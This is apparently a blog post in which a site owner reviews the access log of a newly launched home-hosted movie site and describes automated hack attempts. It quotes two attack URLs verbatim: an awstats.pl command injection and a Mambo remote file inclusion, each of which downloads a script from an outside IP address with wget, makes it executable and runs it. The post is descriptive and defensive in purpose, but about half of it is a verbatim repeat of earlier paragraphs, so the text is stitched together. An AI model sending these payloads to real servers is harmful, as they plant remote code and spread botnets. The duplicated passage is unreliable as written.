access.log analysis: hackers all around
I recently announced the movies worth seeing database; an imdb.com gateway website that I host on one of my home computers. Since I have full access to the access.log
of this website; it was interesting to see how the traffic developed
over the last couple of days since I announced its launch. First of
all, since I referenced this website only on my blog; there were a few
of my blog readers that visited this fresh new website; some of them
with pretty long visits. Then some indexing robots came around,
noticing this new website and issuing HEAD requests and then reading
robots.txt. This is regular web behaviour. However, a few hours later,
some strange requests made their way into the access.log. First, some
hack attempts from some Dallas, Texas internet provider desperatelly
requesting some awstats.pl hack (GET url split in 3 lines):
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3b
wget%20211%2e234%2e113%2e241%2fscripz%3b
chmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
This sad hacker didn't even try to see if there is awstats installed on the website; so his attack was blind and foolish. Next requests tried to find the presence of some xmlrpc.php script and simulate a POST request to them; this script is most likely used often by wordpress in blog software, and opens a trojan doorway for this kind of visitors. Next days I will create a script called like this and intercept the POST attack in its entirety.
Next some regular visitors came around; some from Microsoft Corp., going deep inside the website and getting the feel of it. Then again, 2 days later, some sad hackers from Lima, Peru, trying to find their way in through awstats again. This guy was a little smarter, he first tried to guess the path to awstats; and tried quite a bit to get it; maybe 50 frequently used paths. Again, I should have a dummy script there, just to get the hack attempt and expose it here.
A few hours later, another strange requests first from Poland, then from Wister, Oklahoma, and last from Toronto, Canada; all requesting the very same thing:
/index2.php?option=com_content&do_pdf=1&id=1index2.php?
_REQUEST[option]=com_content&_REQUEST[Itemid]=1&
GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&
cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo|
They all seem to be hacked computers spreading further some fresh new mambo virus located somewhere in Taiwan, in some Sony Network Ltd computer.
A few hours later again, phpgroupware, drupal and wordpress hack attempts. So far, that's all what the access.log shows. Bottom line is that besides regular web visitors, there is really a lot of pollution out there. Many of these zombie remotely-controlled computers are trying to find their way into your website, the soonest you launch it.
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3b
wget%20211%2e234%2e113%2e241%2fscripz%3b
chmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
This sad hacker didn't even try to see if there is awstats installed on the website; so his attack was blind and foolish. Next requests tried to find the presence of some xmlrpc.php script and simulate a POST request to them; this script is most likely used often by wordpress in blog software, and opens a trojan doorway for this kind of visitors. Next days I will create a script called like this and intercept the POST attack in its entirety.
Next some regular visitors came around; some from Microsoft Corp., going deep inside the website and getting the feel of it. Then again, 2 days later, some sad hackers from Lima, Peru, trying to find their way in through awstats again. This guy was a little smarter, he first tried to guess the path to awstats; and tried quite a bit to get it; maybe 50 frequently used paths. Again, I should have a dummy script there, just to get the hack attempt and expose it here.
A few hours later, another strange requests first from Poland, then from Wister, Oklahoma, and last from Toronto, Canada; all requesting the very same thing:
/index2.php?option=com_content&do_pdf=1&id=1index2.php?
_REQUEST[option]=com_content&_REQUEST[Itemid]=1&
GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&
cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo|
They all seem to be hacked computers spreading further some fresh new mambo virus located somewhere in Taiwan, in some Sony Network Ltd computer.
A few hours later again, phpgroupware, drupal and wordpress hack attempts. So far, that's all what the access.log shows. Bottom line is that besides regular web visitors, there is really a lot of pollution out there. Many of these zombie remotely-controlled computers are trying to find their way into your website, the soonest you launch it.
